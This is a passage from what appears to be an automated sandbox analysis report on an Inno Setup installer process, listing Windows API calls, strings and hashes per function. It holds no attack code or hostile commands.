                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Thread$CurrentOffsetRect$ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                          • String ID: >MB
                                          • API String ID: 1771318467-212926588
                                          • Opcode ID: 9c25055f4f46c9ea9ef540a80fbac8b9d8c1e78b0ba4761b28caf18b40fafde6
                                          • Instruction ID: 705f2a192e95c6edbf7467b113717681c3474608ff02e637e93cacb07322a4b7
                                          • Opcode Fuzzy Hash: 9c25055f4f46c9ea9ef540a80fbac8b9d8c1e78b0ba4761b28caf18b40fafde6
                                          • Instruction Fuzzy Hash: DF811671A00218DFCB14DFA8C884ADEBBF4FF48314F51416AE805AB256EB38AD45CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407097
                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407111
                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 00407169
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Enum$NameOpenResourceUniversal
                                          • String ID: Z
                                          • API String ID: 3604996873-1505515367
                                          • Opcode ID: 939149d5aa9101605caf33572431e8dff8441c543f0c6c8b5d6862fe84fd4df8
                                          • Instruction ID: fe88afd7ae99d1cd88c92d979abf1ab5c5088a5c0d84fd8041c215bac6b8633b
                                          • Opcode Fuzzy Hash: 939149d5aa9101605caf33572431e8dff8441c543f0c6c8b5d6862fe84fd4df8
                                          • Instruction Fuzzy Hash: D8518570E04209AFDB11EF95C941A9EBBB9EB49304F1045BAF900B73D1C779AF418B5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0043150C: 76E37E10.OLE32(?,?,00000000,?,?,00431DCF,00000000,00432011,?,?,?,?,?,004321A4), ref: 00431515
                                            • Part of subcall function 0043150C: 76E3A680.OLE32(00000000,?,?,00000000,?,?,00431DCF,00000000,00432011,?,?,?,?,?,004321A4), ref: 0043152D
                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000106,00000000,00432011,?,?,?,?,?,004321A4), ref: 00431DE1
                                            • Part of subcall function 00431538: 6CAD6840.ADVAPI32(80000000,00000000,00000001,00000000,00000000,?,?,00431E09,00400000,?,00000106,00000000,00432011,?,?,?), ref: 0043155D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: A680D6840FileModuleName
                                          • String ID: CLSID\$\Clsid$\ProgID
                                          • API String ID: 2632562839-3614834358
                                          • Opcode ID: 3084d90feecdf774c6aee464760adea991e88dbb1489097d4054674c6568cd63
                                          • Instruction ID: 04e1f787bdd9bc7f31b98ff445f8c8b6e64685fbb5d157f68287dbba7f9a8adf
                                          • Opcode Fuzzy Hash: 3084d90feecdf774c6aee464760adea991e88dbb1489097d4054674c6568cd63
                                          • Instruction Fuzzy Hash: D851117050011C9BCB29EB11D983ACEB7B9AF48705F5055FBA504632A1DB38EF49CE69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5AC50.USER32(00000000,00000000,0042E943,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E81A
                                            • Part of subcall function 0041A2B0: CreateFontIndirectA.GDI32(?), ref: 0041A36F
                                          • SelectObject.GDI32(?,00000000), ref: 0042E83D
                                          • 72E5B380.USER32(00000000,?,0042E928,00000000,0042E921,?,00000000,00000000,0042E943,?,?,?,?,00000000,00000000,00000000), ref: 0042E91B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B380CreateFontIndirectObjectSelect
                                          • String ID: ...\
                                          • API String ID: 1304862298-983595016
                                          • Opcode ID: 3c17e9b259d45102cf2c493247704ee487ce6a76f6b5ddcb32572202881f036b
                                          • Instruction ID: 8cb0686a906b0fecfa73e9aecb4ef0f18aed98045c6f9abe75b37b1c3a9d5cc0
                                          • Opcode Fuzzy Hash: 3c17e9b259d45102cf2c493247704ee487ce6a76f6b5ddcb32572202881f036b
                                          • Instruction Fuzzy Hash: 29316270B00129AFDF15EBAAD841BAEB7F8EB48304F90447BF400A7291D7789E41CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                            • Part of subcall function 00450120: WriteFile.KERNEL32(?,?,00000000,00450352,00000000,00000000,?,?,?,00450352,00000000,00452881,?,0048B721,00000000,00452922), ref: 00450137
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: FileLocalTimeWrite
                                          • String ID: $%.4u-%.2u-%.2u %.2u:%.2u:%.2u $*cE
                                          • API String ID: 1093383541-807682747
                                          • Opcode ID: c2f38518e0a55e0eecc5abd5a429387f84ae3054397d0a343a044653de0c8ad1
                                          • Instruction ID: 196cb984fafb3917f2dd800caca8b552f4554cced74b5b27b2932311db97b8e6
                                          • Opcode Fuzzy Hash: c2f38518e0a55e0eecc5abd5a429387f84ae3054397d0a343a044653de0c8ad1
                                          • Instruction Fuzzy Hash: 6D419F70D04A489FDB11DFA9C9617BEBBF4EB09305F10406AF900A7392D7395E48CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocalTime.KERNEL32(004770CC,00000000,00455AA9,?,?,00000000,00000000,00000000), ref: 0045597D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: LocalTime
                                          • String ID: %.4u-%.2u-%.2u$%s Log %s #%.3u.txt$Log opened.
                                          • API String ID: 481472006-3806465849
                                          • Opcode ID: 4c65395756873fa8bf238fa11bfeb6aaaff53c2e26898d0b82eb73a5467b8d8b
                                          • Instruction ID: 48786d344afea8f2d67796125104a5aaff5ad981458d5bce5972633b0ec6ecc8
                                          • Opcode Fuzzy Hash: 4c65395756873fa8bf238fa11bfeb6aaaff53c2e26898d0b82eb73a5467b8d8b
                                          • Instruction Fuzzy Hash: DC413AB0D00608AEDB00DFA9D8917EEBBF5EB49304F50416AE800A7291D7795E45CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00489BF1,_iu,?,00000000,004523D6), ref: 0045238B
                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00489BF1,_iu,?,00000000,004523D6), ref: 0045239B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: .tmp$_iu
                                          • API String ID: 2962429428-10593223
                                          • Opcode ID: df51f71b4a8b0bd7ac59e239d24441b071503c96b211b47315574063d78003d8
                                          • Instruction ID: 88c0cc572b97f44d35eecdcba92444d0f4aae10aa7095f3427b1f2e7aa4c4a68
                                          • Opcode Fuzzy Hash: df51f71b4a8b0bd7ac59e239d24441b071503c96b211b47315574063d78003d8
                                          • Instruction Fuzzy Hash: DB31A771A00209ABCB10EBA5D942B9EBBB5AF05314F60417BF810B72D2D77C6F04965C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegCloseKey.ADVAPI32(?,00485FFA,?,?,00000001,00000000,00000000,00486015), ref: 00485FE3
                                          Strings
                                          • %s\%s_is1, xrefs: 00485F74
                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00485F56
                                          • Inno Setup CodeFile: , xrefs: 00485FA6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790
                                          • String ID: %s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
                                          • API String ID: 3513276378-1837835967
                                          • Opcode ID: 8b25c034a0cfe78157112a762a586655f957c51a2c88e09446e8d8352b0e5f39
                                          • Instruction ID: 09a24dc8a6022d5224bb5964ae29029ace2ab20c18b37fce72d54143bfae8cca
                                          • Opcode Fuzzy Hash: 8b25c034a0cfe78157112a762a586655f957c51a2c88e09446e8d8352b0e5f39
                                          • Instruction Fuzzy Hash: BB319470A046045FDB11EFA9CC51A9EBBF8EB49304F51487BE900E7391D778AD01CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Class$InfoRegisterUnregister
                                          • String ID: @
                                          • API String ID: 3749476976-2766056989
                                          • Opcode ID: b67c5cc82690fe361babc8edb18181d8eae429c121283e35cc21930cc69649ae
                                          • Instruction ID: 9b7ab25393498a186c60df35d444c5d8236ba3ba9485b5c728226e4dc42ec28e
                                          • Opcode Fuzzy Hash: b67c5cc82690fe361babc8edb18181d8eae429c121283e35cc21930cc69649ae
                                          • Instruction Fuzzy Hash: 14316B706043418BCB20EFA9C58179A7BE6AF44308F00857EF945DB396DB39D944CB2A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042438C: SetWindowTextA.USER32(?,00000000), ref: 004243A4
                                          • ShowWindow.USER32(?,00000005,00000000,0048AC17,?,?,00000000), ref: 0048AA1E
                                            • Part of subcall function 0042D80C: GetSystemDirectoryA.KERNEL32 ref: 0042D81F
                                            • Part of subcall function 0040733C: SetCurrentDirectoryA.KERNEL32(00000000,?,0048AA46,00000000,0048ABE3,?,?,00000005,00000000,0048AC17,?,?,00000000), ref: 00407347
                                            • Part of subcall function 0042D394: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D41F,?,?,00000000,?,?,0048AA50,00000000,0048ABE3,?,?,00000005), ref: 0042D3C9
                                            • Part of subcall function 0044FF00: GetFileSize.KERNEL32(?,00000004,00000000,?,0048AA96,00000000,0048AB11,?,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005), ref: 0044FF0E
                                            • Part of subcall function 0044FF00: GetLastError.KERNEL32(?,00000004,00000000,?,0048AA96,00000000,0048AB11,?,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005), ref: 0044FF1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: DirectoryFileWindow$CurrentErrorLastModuleNameShowSizeSystemText
                                          • String ID: .msg$IMsg$Uninstall
                                          • API String ID: 2328437465-3145681768
                                          • Opcode ID: 50c59b26dbb9911a90d6963744d61b4da2a2a7cc0bee2a413e1b1af889ed0d1b
                                          • Instruction ID: 584b95c17cc84f27c3ed830320dbd0fb8aaeb6f21ec15bc102c40b1ff57954fc
                                          • Opcode Fuzzy Hash: 50c59b26dbb9911a90d6963744d61b4da2a2a7cc0bee2a413e1b1af889ed0d1b
                                          • Instruction Fuzzy Hash: 71319234B00204AFDB00FF6ADC92A5E7775EB49704F90487BF900AB692D678AD14CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 0044FC30
                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FC72
                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FCA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MessageSend$ExecuteShell
                                          • String ID: open
                                          • API String ID: 2179883421-2758837156
                                          • Opcode ID: 8663942d2fe6c78e8e9c1a1681af3218b326b201a91c5666012a1aad4d1f2aec
                                          • Instruction ID: f001f1e600aeaa1ffd1e9368b93cc3e88efae04158a7ae8f82051d1731785f76
                                          • Opcode Fuzzy Hash: 8663942d2fe6c78e8e9c1a1681af3218b326b201a91c5666012a1aad4d1f2aec
                                          • Instruction Fuzzy Hash: AB214470E40208AFDB14EF65CC82B9EB7B8EF44715F10857BB905A72D1D6789A458A48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CF478A0.KERNEL32(00000000,0048B721,00000000,0048AEBE,?,?,00000000,0048D628), ref: 0048AE38
                                          • 6CAD69D0.KERNEL32(00000000,00000000,00000000,0048B721,00000000,0048AEBE,?,?,00000000,0048D628), ref: 0048AE61
                                          • 6CAD6100.KERNEL32(00000000,00000000,00000001,00000000,0048B721,00000000,0048AEBE,?,?,00000000,0048D628), ref: 0048AE7A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D6100F478
                                          • String ID: isRS-%.3u.tmp
                                          • API String ID: 2827116437-3657609586
                                          • Opcode ID: ffd9d71aef5311753b9aa853d672d6d1a56f0c91ee8291c6b414bf17d3b9d56b
                                          • Instruction ID: e3fd0e415be7f1d885ee4f710042870f87f921b7d752074c4af07eef08411aa6
                                          • Opcode Fuzzy Hash: ffd9d71aef5311753b9aa853d672d6d1a56f0c91ee8291c6b414bf17d3b9d56b
                                          • Instruction Fuzzy Hash: 31216471D00209AFDB04FFA9C881AAFBBB9AB44314F50497BF814B32D1D7786E018B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042C81C: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C840
                                            • Part of subcall function 00403DEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
                                            • Part of subcall function 00403DEC: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31
                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00454E40
                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00454E6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                          • String ID: LoadTypeLib$RegisterTypeLib
                                          • API String ID: 1312246647-2435364021
                                          • Opcode ID: fad32255ec39f5bddde890893f74128ee5b3acd24eff5cd1baab6cb26e04de26
                                          • Instruction ID: 89998c4ba19b6db8449fe49ef93fc7c2fb0fa489f5eca5cd6002afcee5c7eb12
                                          • Opcode Fuzzy Hash: fad32255ec39f5bddde890893f74128ee5b3acd24eff5cd1baab6cb26e04de26
                                          • Instruction Fuzzy Hash: 6111B134B00204AFDB11EFA6CC52A4FB7BDEB89709F108476FD04D7652DA388A44C658
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadCursorA.USER32 ref: 004568E8
                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,004569C4,?,?,00000000,0048D628), ref: 004568EE
                                            • Part of subcall function 00456300: CloseHandle.KERNEL32(00000000), ref: 00456330
                                            • Part of subcall function 00456300: WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045635A
                                            • Part of subcall function 00456300: GetExitCodeProcess.KERNEL32 ref: 0045636A
                                            • Part of subcall function 00456300: CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563B0
                                            • Part of subcall function 00456300: Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563C9
                                            • Part of subcall function 00456300: TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 0045634D
                                          • SetCursor.USER32(00000000,0045693F,00000000,00000000,00007F02,00000000,004569C4,?,?,00000000,0048D628), ref: 00456932
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Cursor$CloseHandleProcess$CodeExitLoadObjectSingleSleepTerminateWait
                                          • String ID: 4H
                                          • API String ID: 268187739-4226881615
                                          • Opcode ID: a44efd9e20f5c45914bd30db5dc309204793f1cee191b25ddb53e94e0834ea89
                                          • Instruction ID: 67851fd25c856857a5c091ab00770f849a5380ad850a705b1c67ecbc94730733
                                          • Opcode Fuzzy Hash: a44efd9e20f5c45914bd30db5dc309204793f1cee191b25ddb53e94e0834ea89
                                          • Instruction Fuzzy Hash: C311CA70B143406FD701BFBA8C5265E7BA9EB49704F8288BFB905D37C2D63C88099B19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FileTimeToLocalFileTime.KERNEL32(00000001), ref: 00467178
                                          • FileTimeToSystemTime.KERNEL32(?,?,00000001), ref: 00467187
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Time$File$LocalSystem
                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                          • API String ID: 1748579591-1013271723
                                          • Opcode ID: e5330b616a1db92e1b923fb42046a1647c40c72cc7645d2c59cbf14929901b6f
                                          • Instruction ID: 040e7b09d3ea61fe1a2163efa5d8bd8610466462e14d6e1d46c8e3a29e771093
                                          • Opcode Fuzzy Hash: e5330b616a1db92e1b923fb42046a1647c40c72cc7645d2c59cbf14929901b6f
                                          • Instruction Fuzzy Hash: CA1103A040C3919ED340CF6A845072BBAE4ABC9718F44496EF9D8D6381E77DC948DB77
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD69D0.KERNEL32(00000000,00000020), ref: 0045283F
                                            • Part of subcall function 00406FE4: 6CAD5F60.KERNEL32(00000000,0048D628,0048B356,00000000,0048B3AB,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406FEF
                                          • 6CAD6060.KERNEL32(00000000,00000000,00000000,00000020), ref: 00452864
                                            • Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D6060ErrorLast
                                          • String ID: DeleteFile$MoveFile
                                          • API String ID: 581812409-139070271
